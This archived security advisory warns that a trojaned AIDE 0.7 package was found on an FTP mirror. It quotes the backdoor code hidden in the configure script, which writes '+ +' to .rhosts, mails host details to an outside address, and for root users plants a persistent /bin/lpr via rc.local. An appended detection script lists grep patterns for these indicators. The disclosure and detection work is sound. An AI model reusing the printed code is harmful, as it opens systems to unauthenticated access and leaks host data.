It has come to my attention that there has been a trojaned Aide distribution at ftp://ftp.linux.hr/pub/aide

The offending binary has been removed.

Anyone who has downloaded Aide 0.7 from ftp.linux.hr is urged to download it from ftp://ftp.cs.tut.fi/pub/src/gnu and always check the PGP signature before using any distribution of Aide.

The trojaned distribution contains the following script embedded in the configure script. As you can see, it tries to add "+ +" to root's .rhosts and sends information about your host to l4m0rat_private

    # checking if we are root or not
    if [ `whoami` == "root" ];then
      root_user=1
    else
      root_user=0
    fi

And later on:

    if [ $root_user != "1" ];then
      echo "+ +" > ~/.rhosts
      echo $LOGNAME >/tmp/jea;whoami >>/tmp/jea;hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
      mail l4m0rat_private < /tmp/jea
      rm -rf /tmp/jea
    else
      if [ `uname -s` != Linux ];then
        echo ""
      else
        mv -f .xinitrc /bin/lpr
        echo "# printing status monitor" >> /etc/rc.d/rc.local
        echo "/bin/lpr &" >> /etc/rc.d/rc.local
        hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
        mail l4m0rat_private < /tmp/jea
        /bin/lpr &
        rm -rf /tmp/jea
      fi
    fi

Rami Lehti
--
AIDE - Advanced Intrusion Detection Environment
Check http://www.cs.tut.fi/~rammer/aide.html
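An added example, not part of the original post or of Aide: a POSIX shell heuristic that scans a configure script for the behaviours seen in the quoted trojan (a write to .rhosts, an append to rc.local, mailing a /tmp file, moving a file into /bin). The function names, patterns and sample input are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post). The patterns are assumptions
# derived from the script quoted above; they are a heuristic, not a full
# signature set, and do not replace verifying the PGP signature.

# scan_configure FILE
# Prints "FILE:LINE: [label] text" for each hit.
# Returns 0 if nothing matched, 1 if any indicator matched, 2 if unreadable.
scan_configure() {
    file=$1
    hits=0
    [ -r "$file" ] || { echo "cannot read: $file" >&2; return 2; }
    # One "label|extended-regex" pair per line of the here-document.
    while IFS='|' read -r label pattern; do
        if out=$(grep -nE -- "$pattern" "$file"); then
            hits=1
            printf '%s\n' "$out" | while IFS= read -r line; do
                printf '%s:%s: [%s] %s\n' \
                    "$file" "${line%%:*}" "$label" "${line#*:}"
            done
        fi
    done <<'EOF'
rhosts-write|>>?[[:space:]]*[^[:space:];]*\.rhosts
rc.local-append|>>[[:space:]]*/etc/rc\.d/rc\.local
mail-tmp-file|mail[[:space:]]+[^[:space:]]+[[:space:]]*<[[:space:]]*/tmp/
move-into-bin|mv[[:space:]]+(-[a-zA-Z]+[[:space:]]+)?[^[:space:]]+[[:space:]]+/s?bin/
EOF
    return "$hits"
}

# Constructed sample input: a build-script fragment that uses the behaviours
# quoted in the post. The mail address is a placeholder, not from the page.
sample_trojaned() {
    cat <<'EOF'
echo "checking for gcc... gcc"
echo "+ +" > ~/.rhosts
hostname >>/tmp/jea;/sbin/ifconfig >>/tmp/jea
mail someone@example.invalid < /tmp/jea
mv -f .xinitrc /bin/lpr
echo "/bin/lpr &" >> /etc/rc.d/rc.local
EOF
}

# Demo on the constructed sample (exit status 1 is expected here).
tmp=$(mktemp) && sample_trojaned > "$tmp"
scan_configure "$tmp" || echo "indicators found (status $?)"
rm -f "$tmp"
```

A clean result only means none of these four patterns matched; the signature check against a key obtained from a trusted source remains the actual integrity control.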
This archive was generated by hypermail 2b30 : Tue Aug 07 2001 - 09:36:02 PDT